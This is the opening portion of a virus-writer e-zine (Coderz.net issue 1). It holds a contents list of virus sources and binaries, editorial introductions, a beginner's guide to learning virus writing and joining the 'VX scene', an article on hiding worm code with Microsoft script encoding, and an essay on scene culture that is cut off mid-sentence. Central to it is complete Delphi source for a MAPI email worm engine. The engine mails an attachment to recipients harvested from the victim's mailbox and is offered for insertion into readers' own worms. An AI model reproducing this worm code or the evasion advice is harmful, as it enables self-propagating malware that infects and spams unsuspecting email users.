Gigabyte's Introduction
Evul's Introduction

Articles
MAPI Worms in C++ and Delphi - HomeSlice
Viral Introduction - Gigabyte
Script encoding - Zulu
Some politically incorrect words about the so-called "scene" - Spanska
Faster Spreading - SnakeByte
AV-List - SnakeByte
Are Anti-Virus Companies Criminals? - SnakeByte
Some Tipz & trix for Win2k - Ratter
A few ideas for viruses - Kalkin/EViL
The protector scene - Kalkin/EViL
Katja Kladnik (Lucky Lady) - Richard Karsmakers, contributed by Al Leitch
Anti Avp Vbs I-Worms Detection - [K]Alamar
Retro the easy way - MidNyte
How to become the world's richest man - MidNyte
An Introduction to Encryption, Part III - MidNyte

Source Code

ASM
Win32.Infinite - Billy Belcebu/IKX
W9x.mATRiX - Lifewire/IKX
Dildo - T-2000/IR
Tequila - Disassembled by T-2000/IR
Bad Seed - Disassembled by T-2000/IR
Win95.Yildiz - Black Jack
CU.1076 - Disassembled by Black Jack
Win.Tentacle_II - Disassembled by Black Jack
Win32.DDoS - SnakeByte
Win32.CrashOverwrite - BeLiAL
One Half - Disassembled by Ratter

HLL
Win32.HLLP.Scrambler.b - Gigabyte
Win32.HLLP.STD - Error/Team Necrosis
Win32.HLLW.Hop_Along - Quilb

VBA & VBS
AM97.Lea - Knowdeth/Metaphase & NoMercyVirusTeam
WM97.NoBodyHears - AngelsKitten/NuKE
NETWORK/OUTLOOK.FakeHoax - Zulu
WM97.Neclovek - Lys Kovick/Metaphase
WM97.Unperson - Lys Kovick/Metaphase
HTML.MSBound - Suppa
WM97.LSD - WalruS
WM97/2K.Aida - e[ax]
WM97/2K.String - e[ax]
WM97/2K.String2 - e[ax]
WM97/2K.Blade - Necronomikon
WM97/Lithium - jackie
XM97/Fireal - jackie

Batch
HighHopes.c - Knowdeth/Metaphase & NoMercyVirusTeam
Fuck That 1.0a - Deloss/NuKE

Binaries
Win32.Infinite - Billy Belcebu/IKX
IRoK v1.1c - Raid/SLAM
Win32.HLLP.Scrambler.b - Gigabyte
I-Worm.Scooter - Gigabyte
Dildo - T-2000/IR
NETWORK/OUTLOOK.FakeHoax - Zulu
Win32.HLLP.Adrenaline - Anonymous
Win95.Yildiz - Black Jack
Showdown - GzR/NuKE
Prophecy - GzR/NuKE
Win32.CrashOverwrite - BeLiAL
Win32.HLLP.STD - Error/Team Necrosis
WordMacro.Blur.a - Knowdeth/Metaphase & NoMercyVirusTeam and AngelsKitten/NuKE

Interviews
Real Time Interview with Rajaat
Interview with Raid/SLAM, about Irok
Interview with The Unforgiven
Interview with Del Armg0/MATRiX
VX meeting 2000 in Czech Republic: Opinions of a few VXers

Tools
E-Z Disassembler & Dumper 1.0 - GzR/NuKE
Word97 VBA SR1 Generator ver 1.1k - Knowdeth/Metaphase & NoMercyVirusTeam

Humor
Kevin & Kell - Bill Holbrook, contributed by SnakeMan
The case of the stupid IRCop - Raid

Gigabyte's Introduction

Hey there..

What is this e-zine? Well, it's mainly an oversight of what's been going on in and around the VX scene the last year.
The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.net
grow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hosting
several (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effort
you put into Coderz.net.
Thanks also go to:

Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life
(writing the answers down in his hard to read kinda handwriting :)
GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meeting
itself of course :)
Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :P
EXE-Gency and Del Armg0: For contributing another interview.
Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you.

Greets:

Evul: Keep your dirty socks away from #virus! :)
Spyda: /me bites you :P
Queen: Males.. nothing but trouble, right?
Raid: How about we all smoke some weed and burn infected users with the hot ashes, hmm? :)
Darkman: Walking sex encyclopedia
Benny: Lying down on a used condom is not a good idea.. no, not even at a VX meeting! Unless you're called Benny..
Jackie Twoflower: Lz0#2 is nice :)
Rajaat: I still hate qwerty keyboards
T-2000: Fries and beer!
Vecna: Still can't dance?
Mandragore: Cheeseburgers :)
Several other people in the scene.. I won't fill a whole zine with just this list :)

Fuck you:

Virus-X (aka Trevelyan or Frieza)
Rhape79
Nala
The Bughunter (aka CWarrior)
Graham Cluley: You damn sexist

Evul's Introduction

Welcome to Coderz.Net zine issue 1.
After a long delay, and lots of procrastination, here it is - humble as it may be. This zine is made up of submissions from
many members of the VX scene, and edited in whole, by Gigabyte. We hope you enjoy this zine and coderz.net - and
if all goes well, hopefully there will be an issue #2.

Coderz.Net was never meant to be what it has become - it simply happened. It started out as a simple homepage, and
then a few sites were added, and from there it grew enormously. Over the last year it has been running on average
80 websites, and taking traffic at rates of over 1.5 million page hits per month at times. I have done my best to make
sure that the site is functional for users, and that the site stays up to date, however this has become quite a job lately,
due to the size and demand of the site. Along with the normal troubles that come with such a site, Coderz has been
through major technical problems, threatened, harassed, attacked, and run out of ISPs by the anger resulting from
isolated incidents - yet at over two years of age, it's still here and doing fine.

The idea of starting a zine was kicked around for a while by myself, and I decided not to, for lack of time and patience
to do so myself. A few months later, Gigabyte came to me about doing a zine for coderz, and after lots of
ideas/debating she decided to take on the job and put together a zine herself .. great job, Gigs.

Back to the workload talked about earlier, we desperately need people willing to dedicate some time to helping with
Coderz, so both the site and the zine may continue to grow and improve. Anyone who is interested in helping, we
would be happy to hear from you. Email me at evul@coderz.net if you want to contribute. As part of the "live
and learn" process involved in getting this zine out to you, we decided that if there is to be a #2, we will definitely
need people to help with it. Contact Gigabyte (Gigabyte@coderz.net) about the zine.

Once again, many thanks to Gigabyte for the hard work on this zine, and we apologise for the extended wait for this
release.

Well, enough of my ramblings, go read the damn zine already!
Best Regards,
John

evul@coderz.net

program mapiworm;
uses
Windows, MAPI;
{$R *.RES}

(************** MAPI Worms in C++ and Delphi *********************

I haven't seen much documentation on writing a worm via Win32 HLL's
so here goes. Nothing revolutionary, just simple API calls.
This article is mainly aimed at the beginner, since actually researching
this shit by hand is a major pain in the ass and time-consuming.

I'm showing the code in Delphi cause it's a bit easier to read
and looks nicer than C++. Code can easily be converted to C in
about thirty minutes, see Microsoft's MSDN section for a complete
MAPI C++ example for the syntax. A ton of code can be snipped before
inserting into your personal worm. I figure showing it in "long form"
to be nice etiquette for an article-specific program.

This code was tested on NT 4.0, but might need a revision dependent
upon your OS and how MAPI is setup. And before you laugh at 20k for
just the worm engine, I checked AVP's site for MAPI and found some
very large filesize worms doing moderately well in the wild:

I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe/win32/ppark.stm
I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms/zipped.stm
I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINEXT.stm
I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage.stm

Couple of useful links:

Info on MAPI hook provider
http://support.microsoft.com/support/kb/articles/Q224/3/62.ASP

MAPI Address example
http://support.microsoft.com/support/kb/articles/Q126/6/58.asp

ReadMail example
http://support.microsoft.com/support/kb/articles/Q140/3/37.asp
*)

// Usage: HKEY_CURRENT_USER, 'Software\ImaFaggot', 'GayLesbian'
function regReadString(kRoot: HKEY; sKey, sValue: String): String;
var
qValue: array[0..1023] of Char;
DataSize: Integer;
CurrentKey: HKEY;
begin
RegOpenKeyEx(kRoot, PChar(sKey), 0, KEY_ALL_ACCESS, CurrentKey);
Datasize := 1023;
// RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, nil, @DataSize);
RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, @qValue[0], @DataSize);
RegCloseKey(CurrentKey);
Result := String(qValue);
end;

var
MAPIMessage: TMAPIMessage;
lppMapiMessage: PMapiMessage;
Recip, inRecip: TMapiRecipDesc;
msgFile: TMapiFileDesc;
MError: Cardinal;
MapiSession, iMinusOne, i: LongInt;
bWinNT, bFindFirst: Boolean;
ProfileName, sAddress, sProfile, sSentMail: String;
sSeedMessageID, sMessageID: array[0..512] of Char;
os: TOSVersionInfo;
begin
// Which Operating System we on?
os.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
GetVersionEx(os);
bWinNT := (os.dwPlatformId = VER_PLATFORM_WIN32_NT);
// Grab default profilename from registry
if (bWinNT) then
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles',
'DefaultProfile')
else
// Standard Windows
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows Messaging Subsystem\Profiles', 'DefaultProfile');

// Fucking Delphi bug won't allow a -1 to be set
// within the structure, so we trick it
iMinusOne := -1;
// Will hold any previous recipients
sSentMail := '';

// Logon to MAPI. If no workie, get outta here
try
MError := MapiLogOn(0, PChar(ProfileName), nil, MAPI_NEW_SESSION, 0, @MapiSession);
if (MError <> SUCCESS_SUCCESS) then
Exit;
except
;
end;

// Fill in the file structure with our attachment
with msgFile do
begin
ulReserved := 0;
flFlags := 0;
nPosition := iMinusOne; // Let Outlook handle the file position
// Obviously, replace the INI with your worm's path/filename
lpszPathName := PChar('c:\windows\system.ini');
lpszFileName := nil;
lpFileType := nil;
end;

bFindFirst := True;

// Walk through first fifty messages
for i := 1 to 50 do
try
// Keep up with our MessageID
if (bFindFirst) then
begin
sSeedMessageID := '';
bFindFirst := False;
end
else
sSeedMessageID := sMessageID;

// Find a message
// MapiFindNext serves as both a "findfirst/findnext" function, dependent
// upon if MessageSeed has a value
MError := MapiFindNext(MapiSession, 0, nil, @sSeedMessageID, 0, 0, @sMessageID);
if (MError = SUCCESS_SUCCESS) then
begin
// Obtain the long pointer
lppMapiMessage := @MAPIMessage;
// Open for Reading, headers only (both faster, and avoids
// writing all the god damned attachments to temp directory)
MError := MAPIReadMail(MAPISession, 0, @sMessageID,
MAPI_ENVELOPE_ONLY, 0, lppMapiMessage);
if (MError = SUCCESS_SUCCESS) and (lppMapiMessage.lpRecips <> nil) then
begin

// Sets info about message recipient
with Recip do
begin
ulReserved := 0;
ulRecipClass := MAPI_TO;
sAddress := 'SMTP:' + lppMapiMessage.lpRecips.lpszAddress;
lpszAddress := Pchar(sAddress);
lpszName := lppMapiMessage.lpRecips.lpszName;
ulEIDSize := 0;
lpEntryID := nil;
end;

// Clear out to avoid any leftover setting
FillChar(MAPIMessage, SizeOf(MAPIMessage), 0);
// Fill the MapiMessage structure.
// Unnecessary to expand entire struct, but aesthetically pleasing
with MapiMessage do
begin
ulReserved := 0;
lpszSubject := PChar('Insert subject for message');
lpszNoteText := PChar('Message text goes here');
lpszMessageType := nil;
lpszDateReceived := nil;
lpszConversationID := nil;
flFlags := 0;
lpOriginator := nil;
nRecipCount := 1;
lpRecips := @Recip;
nFileCount := 1;
lpFiles := @msgFile;
end;

// Send the message
if (Pos(lppMapiMessage.lpRecips.lpszAddress, sSentMail) = 0) then
begin
MError := MapiSendMail(MapiSession, {handle}0, MapiMessage, 0, 0);
// Store this address, so no duplicate messages are sent
sSentMail := sSentMail + lppMapiMessage.lpRecips.lpszAddress;
end;
end;
end;
except
; // Process your errors like a man
end;
try
MError := MapiLogOff(MapiSession, 0, 0, 0);
except
;
end;
end.

Viral Introduction
Gigabyte

Explanation of some words.

Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you might
see them in the rest of the zine as well.

VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them..

AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee...

IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet for
example.

IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC..

ASM: Assembly language. This is the language most viruses are written in.

TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files.
(Requires TLINK)

VBA: Visual Basic for Applications. It's a part of the Microsoft Office products.

VBS: Visual Basic Scripting language. Can be inside an HTML page. (For more information see the part about script
viruses in "What is:", further down in this document.)

Where to find information about viruses and collecting?

Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site should
be coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might contain
other links to VX sites elsewhere.

Coderz.net
29A
#virus Homepage
Virus Trading Center
Tally's Virus Link Reference

If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVER
ask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying,
and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit
of effort. If you can’t be bothered, or haven’t got the intelligence to find even a few, then you’re not likely to be helped
out. People in the scene will gladly help you out if you put in the effort first to prove you’re not just going to infect
someone’s computer. They need to know you’re interested in learning.

In which language are viruses written?

Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications
(VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, but
they're a rarity. A newer option is VBS, a scripting language that can be used for making worms or viruses.

How to learn how to write viruses?

If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, for
example. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to write
viruses. You can find answers to all kinds of virus-related questions in VDAT, you can find some VX history, etc. One
warning about VDAT though: it's currently nearly 10Mb and can take a long time to download. It is definitely worth it
though. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan, as I have been
asked before. If you were going to write a trojan, would you make it 10Mb? I guess you'll have to trust me on that :)

Download VDAT from:

Coderz.net's FTP

And also the Codebreakers magazines are good.

Get them from:

Codebreakers

or

Coderz.net's FTP

(Most of their tutorials can be found in VDAT)

Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your own
pace with the rest.

For which words to search when looking for viruses or information about viruses?

Search for: virus, viruses, virii, VX, computervirus. The best search engine to use is http://www.hotbot.com for an
exact match. This can be useful when the URLs of the virus sites I gave you are down.

How to get into the VX scene?

You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to code
viruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learning
how to code viruses might also take some time. If you have questions, first look if you can find the answer in VDAT
before asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished.

Is it illegal?

That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, but
spreading is. So if you send someone a virus without informing the person that it's a virus, that would be considered
spreading. Always check your country’s laws before doing anything virus-related. Governments don’t generally
understand you can be interested in a virus without needing to spread it, if you have a virus they assume you intend to
spread it.

Why do people write viruses?

There can be many reasons: challenge, fame, buck authority, they want to do something different..

What is:

an overwriter: A virus that completely overwrites files to infect them, so it doesn't save the original file. This is what
you start with when you learn to code viruses. The host file is completely destroyed, so the virus is noticed almost
immediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2.

an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the host
program. At the end of the virus is some code to restore the program (in memory only) and run it. Because the host
program still works, your virus has a better chance of going unnoticed than an overwriter. This is explained in
Codebreakers magazine #2 or SLAM magazine #3.

a prepender: A prepending virus will write itself to the start of a program instead of the end. This has the advantage
of not requiring a calculation called the 'delta offset'. Don't worry about this yet, the tutorials will explain it when you
get there, I just mention it so you know that there is a difference between a prepender and an appender.

encryption: Encryption is a way to hide the true function of your virus code, and any messages contained in it. An
encrypted virus has a decryptor at the start that decrypts the rest of it, then passes control to the now unencrypted part.

polymorphism: A virus that creates a completely different decryptor every time, to avoid the AV being able to make a
scan-string for the virus.

TSR: A virus that stays resident in memory. This can be particularly effective, because any program even listed in a
'DIR' command can be infected by a TSR virus.

bootsector: A bootsector is the part of the disk that is read automatically when the computer starts and loads the
operating system. A virus that infects here can load before the operating system, and therefore before any AV program
can be installed in memory.

a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus.

a script virus: A virus made in JavaScript or VBS. Those languages can be used inside an HTML page, so the virus
can be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'.
Scripting languages are also good to make worms in. An example is Bubbleboy.

How to get recognized?

Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for,
know where to look for tutorials and virus sites and that you know what the VX scene is.

Good luck,

Gigabyte

Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction'
picture.

Script encoding
09/09/2000

Hi all.

First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :)

I was going to submit my last worm for the zine, but instead I decided to write some things about
encoded scripts (JScript/VBScript) and only use that worm as an example. By this I mean Microsoft's encoding,
not other manual ways of encoding or making your code harder to read.
So this is my first article for a zine; most of my viruses/worms were included in many zines, but just that, not real articles
or tutorials.

Script encoding in HTML files

Script encoding started with Internet Explorer 5. At that time it was already possible to use the "<script>" tag of HTML files
to write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property of
that tag: "JScript.Encode" and "VBScript.Encode".
Examples:

<script language="JScript.Encode">

<script language="VBScript.Encode">

I say that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are the
versions that introduced this feature.

To encode your script you need Script Encoder, which is available from http://msdn.microsoft.com/scripting. This
Win32 command line program reads your HTML file with a script tag having "VBScript" as its "language" value
and writes a new HTML file with your code encoded and the "language" attribute changed to
"VBScript.Encode". The same happens when using JScript.
For example, something like this:

<script language="VBScript">
MsgBox "Example"
</script>

Will be changed to:

<script language="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>

Keep in mind that this encoding is really designed for casual readers of your code; the truth is that it's trivial and will
not protect your code from people who are determined to view it.

Of course these things are only supported in Internet Explorer, not in other browsers. Script languages are not
part of the HTML language; not even the "language" attribute is part of HTML 4, the correct attribute would be
"type", but that is another matter that is not virus related.

At the time of writing this I know of only one virus using this feature in HTML files, HTML.Lanus, which I wrote some time
ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML files
are not a real target for viruses, since scripting in them needs authorization from the user when using most of the needed
objects, unless some kind of bug is used to skip the warning message.

Script encoding in Windows Script Host

Windows Scripting Host 1 (also called WSH in this text) was included for the first time in Windows 98. It
supported JS (JScript) and VBS (VBScript) files for scripting, and with this a new type of virus was started by
Lord Natas. No encoding was possible.

Some time later Windows Scripting Host changed its name to Windows Script Host and version 2 came out. One of the
things this new version added was the possibility of encoding our scripts, as was already possible with HTML files, by
using two new extensions, JSE and VBE.
JSE files are JS files after using the encoder; the same goes for VBE and VBS.

Using the encoder with JS and VBS files works the same as with HTML files: it reads a VBS file with our script and
creates a VBE file with our encoded script.

NETWORK/OUTLOOK.FakeHoax

NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/worm
using the JSE and VBE extensions (at least not as auxiliary files), so it has two versions, one in JScript and the other in
VBScript.

It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML and
VBScript using Windows Script Component, so the code in the JSE and VBE files is trivial. Both versions create a
WSC file (the COM object defined in XML) and then both call methods and change properties of that object; no real
spreading code is in those files.

The worm was written in this way to make it easier to port to any other language; this way I was able to create a
JSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi,
Visual C++, or any other language by using "REGSVR32.EXE" to register the WSC file as a COM object before calling its
methods or changing its properties.

This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this they
were only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me, for
example). Besides, since it needs Windows Script Host 2 or later, it won't spread well at the time of
writing this.

Also, this was a good opportunity to use Windows Script Component for the first time, because it made it possible
to write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/worm
using its own COM object.

NETWORK/OUTLOOK.FakeHoax text file including source code: network_outlook.fakehoax.txt.

NETWORK/OUTLOOK.FakeHoax ZIP file (text file and working copies of the worm): network_outlook.fakehoax.zip.

Script encoding support

When writing viruses you must know on which systems your code will work. Even though script encoding is not new, it
was not a viable feature for viruses since not many systems supported it. But this is changing these days, and
encoding is now possible for a worm with good spreading capabilities.

Script encoding in HTML files: supported on any system with JScript/VBScript 5+ (included in Internet Explorer 5+).
JSE and VBE files: supported on any system with Windows Script Host 2+ (included in Windows 98 SE, Windows
2000 and Windows Me).

Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, an
encoded script in an HTML file could be run in Internet Explorer 4 if the JScript/VBScript 5+ separate package is
installed.

Trick to run JSE and VBE files in systems with WSH version 1

By using a trick I found, JSE and VBE files can be run on systems with WSH version 1 instead of version 2 if
JScript/VBScript 5+ is installed.

Let's see an example: a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. The WSH 2+
separate package was not installed.
So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless it
was not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5.
This system is able to understand encoded scripts; it just doesn't have support for the JSE and VBE extensions. So to
run a JSE or VBE file we can create a WSH file that calls the encoded script.

This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (which
is supported in WSH 1) that runs the VBE file.

This method was used in OUTLOOK.Monopoly: the worm was a VBS file that created a WSH and a VBE file and
then ran the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with Internet
Explorer 5 installed. WSH 2+ was not needed for this worm.

I won't explain how WSH files work; to learn more about them, create a JS file and then view its properties.
Changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)

Other file types in which script encoding may be used

Script encoding can be used in any file format that accepts the "<script>" tag. Some file formats like WSC
and WSF are not supported by the current version of Script Encoder, but you can include encoding in those file
types by creating the "<script>" tag in an HTML file and then copying the encoded code to the WSC or WSF file.
The extensions recognized by Script Encoder are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.

Script encoding and viruses

You can use this feature in HTML viruses/worms, even though they are not something very interesting, or you may use
it in worms in JSE or VBE format, which are better methods.

Normal viruses in JSE and VBE format are not interesting, since it would be like JS and VBS viruses: there are not
many files to infect, since they are not used much by people. Well, maybe you can find lots of them on my computer,
since I'm so crazy about scripting and I use it for lots of simple tasks, but most users don't use WSH. :)
Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encode
it again.

These days there are a lot of worms in VBS files (not so with JScript ones); well, all these worms
could be easily encoded.

Encoding VBS files has two advantages:

1) The code will be encoded, so it will be harder to read, and most users won't do that.
2) VBS files are a known target for worms, but VBE files are not. So the VBE extension is far better for them.

But there are also two disadvantages:

1) Some old systems may not be able to run VBE files.
2) The script will be a few bytes bigger. But only a few, so this is not really a big disadvantage.

Well, that's all. Let me know about any technical errors you find or any questions you have.
Bye all.

Zulu
zulu_vx@techie.com
http://coderz.net/zulu

Some politically incorrect words about the so-called "scene"

[by Spanska, written for Coderz.net e-zine]

- Ethnographic introduction

Virus writers and all people classified globally under the "Vx" label are an interesting
population to observe. Especially if you can have a look from the inside, and, at the
same time, if you're not involved enough, in order to be able to see the "scene" from an
independent and exterior point of view. I think I qualify here. I've been around for a few
years, met some coders in real life, wrote some viruses, but at the same time I was never a
member of any group, I'm old enough to be able, I hope, to think with some distance,
and these last months I basically had better things to do than to write code.

- Don't ask "How much time you spend on IRC?", but ask "Show me your code!"

The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed to
see how people spend so much time chatting about everything except virus coding
techniques. They think that to be a real virus writer, you need to be accepted in some
virus channel, and then spend twelve hours a day there. High doses of IRC induce a
sort of twist in reality perception, because people behave there very differently from real
life. How many people have we seen, and will we see, very proud of their brand new op,
kicking, banning, laughing about infected users, acting as some powerful aggressive elite.
Even if they never produced one single line of code. Even if they never did anything
useful for the Vx community. Even if their only production is a twenty line macro-virus.
Even if they have to go to school the day after, where they will not be "DarkLordz" or
"KillerGod" anymore, but normal average teens who have to do their homework. If you
think you're a mature person, and I guess most of us are, behave as a mature person
even on IRC.

You may think I exaggerate when I talk about this twist of reality. Unfortunately, I can
cite lots of examples. Let's take one that everybody heard about. This coder, no need to
tell his nickname, according to his own words, sent logs to some anti-virus people
showing that another coder was actively spreading viruses, to "protect one or two
channels from being deleted by Undernet". Basically, that means that the existence of
IRC channels is more important than a real person's life. Because, unfortunately,
nowadays, spreading viruses can lead directly to some years in jail, depending on the
laws in your country. Which means a destroyed life. Just to "save a channel". You see
the twist. I'm pretty sure now the guy in question recognizes the big error he made, and
I hope he learnt from that, but anyway, it's too late.

This example was of course a bit unique in its importance. But it's typical of a state of
mind very widespread in the Vx community. People think an op is the most important
thing in life. They think their rank level in the channel's bot is the only important thing,
proportional to their eliteness. Twist again. Importantly, this changes the
communication and the behaviour between people. Who is going to criticize the owners
of their favourite channels? Or more generally, people with a higher level? This leads to
hypocrisy, which is very widespread in the community.

I saw too many examples of guys and girls spending so much time on IRC that
everything that happened there, even the most anecdotal fights, took on a huge
importance. Let me tell you: if you need a computer and to be connected to feel human
emotions like pain, anger, friendship or love, there is something wrong. Really.

IRC has another problem. It's dangerous. It seems that Vx people never learnt the
lessons from the Melissa case. They don't care about encryption, they don't care about
remailers, they don't care that what they say on-line can be used to profile or trace
themselves or, even more importantly, some of their friends. They keep megabytes of
sensitive IRC logs and old mails. They just don't care until the worst happens. Virus
writing and spreading is no longer a funny game. It's a dangerous criminal activity, and
you have to take this fact into account, especially if you spread your viruses, or have
friends who do that. This is the main revolution in Vx Land these recent years. Now
they are seriously after us. And nobody cares.

- Vxers as crickets

Let's talk about another interesting behaviour in the Vx scene: the flocking in groups.
It's funny how people who repeat so often that they are independent, or think
different, do all they can to join or create some clan of similar people, and
then be proudly tagged as a member of a larger entity known as a Vx group, with its
own set of new rules and laws they have to conform to. Like sheep. The analogy is not
here just as a cheap provocation. It's a very old animal behaviour. Individuals are weak;
if they flock, they are stronger against all possible enemies. Or at least they feel
stronger. Crickets are a good example. Whenever they form a very large group, their
behaviour changes completely and they become much more aggressive. They are no longer
afraid of predators. It's very funny to see the same kind of basic animal regression in
Vx crowds.

Or maybe it's just to get some form of recognition. People with no skill, or people
afraid to learn (because we were all lamers at day zero, we should not forget that) know
that they will never be accepted in the community on their own merits. So they need a
sort of official tag to prove to others, and maybe even more to themselves, that they are
part of the Vx scene. This mark is provided by membership in some group, which
provides, easily and quickly, an official entrance ticket into the scene. No need to produce
anything useful now. You are already inside the community, even if by a totally artificial
way.

Here again, examples are numerous. Was it one year ago that a new mainly English-based
group appeared, totally over-hyped, with every newcomer wanting to join?
They did nothing, most of their members were just plain unknown, but you couldn't
miss their presence on IRC. Everybody laughed at them, but nobody told them directly
that they were totally ridiculous, for example with their "public relations department"
(more on that later), and other really laughable things. Yet, again, IRC was the main
"scene" participation. Where is the code? I think now this group has returned to the dust it
appeared from, but who really cares? I remember too the ridiculous but finally
rewarded ass-licking efforts by a coder (who is a cool and very intelligent guy, but
anyway) to join a high-profile group. Once he was at last able to glue this well-known
tag to his nickname, he had reached his goal, and just disappeared. He never coded
anything else.

People sometimes tell me: "being a member of a group is a good way to get motivated". If you
need to be motivated or gently forced to be a vxer, it would be a better idea to spend
your time fishing, or doing something you don't need to be motivated for. Forget for a
moment the question "how to be a vxer" (and basically, if you still don't know the
answer, it's time to return to your stamp collection), but ask yourself the more important
question: why do you want to be a Vxer? For the hype? Because it's cool? Because
people will fear you? Because you want to satisfy your ego? Because you want to
impress your girlfriend or your mom? Because you're looking for on-line friends? Or
just because you are curious, you want to code and learn some new knowledge?

- I'm soooo afraid to talk with normal people!

Another strong criticism and clear sign of immaturity that comes to mind. Most Vxers
are not able to argue with people from the two other sides of the virus triangle: anti-virus
people and infected users. There is a good place for that: alt.comp.virus on Usenet.
A mainly anti-virus group nowadays, unfortunately, with some uninteresting parrots,
but anyway, the only place where you can directly and publicly discuss with members
of the anti-virus industry. They have their share of big hypocrisy, ego and closed minds, of
course, but I'm not talking about them right now. These guys, and some of them are
very smart, have a lot of tough arguments to oppose to us. The easy way, used by most
Vx people, is not to participate in this group, and to avoid any kind of discussion. Or
just to pop up there once, insult everybody, and jump back into their hole. What does it
mean? Easy: virus writers are not open-minded enough to quietly discuss with people
opposing them, listen and contradict some opposing argumentation. Or maybe they are
not smart and mature enough to engage in an adult discussion. It is kind of funny
because Vx often ask for people to be open-minded about virus writing activities.
Instead of bashing the largely beloved Nick Fitzgerald on IRC, where he is not, what
about trying to argue against him publicly in the newsgroup? Of course, it may be a
bit tougher, due to his rhetorical skills.

Some Vx people told me that they don't participate in this forum because it's a mainly
AV group. Think a bit more about this argument. It's kind of recursive, a bit like
an infinite loop, to use coding terms. It looks like a self-fulfilling prophecy. In other
words, it's plain stupid.

- Ego scene

I could talk more about the grossly over-inflated ego of most of us (me included), but
my hour of reflection is over. Anyway, just as an example, I always find funny the
dramatic and emphatic farewells from people leaving the "scene", although they
generally never produced anything noticeable, texts apparently always written with
some emotion. If you want to leave, just disappear silently and return to where you
came from, nobody will notice anyway, keep contacts if you want, and don't bother
people with your ridiculous tears in the eyes and other "official" retirement. The day
you decided to become a vxer, you didn't issue a public statement "People, listen to me,
today I officially join the vx scene!". So, do the same when you leave. Every other way
to stop is just a desperate and childish call for attention, from people who didn't
receive enough of it for their production during their career, an ultimate try to turn
people's eyes in their direction for one or two minutes. This impression is even worsened
when the guy gives, as a reason, "there is too much shit in the scene these days", or
something like that. That clearly means that they were not here to code and to learn.
They probably needed to be accepted in whatever community to find some other people
to talk with. What about the Barbie doll collector scene? Now that I think about it, the
ultimate case of lameness is the guy who declares everywhere that he quits, and is
actually still around. Not even able to follow his own words.

Another example, linked with the group problem. It seems that some people create a
group for the sole excitement of becoming a boss, being able to recruit people, command
them, and fire them if needed. People always need to find other people even lamer
than themselves to enhance themselves, it's an eternal law of human beings. Same
mechanism of false and artificial feeling of power as on IRC. It's "my" group, "my"
board, "my" zine, "my" channel, and there I am the king. More generally, a rigid
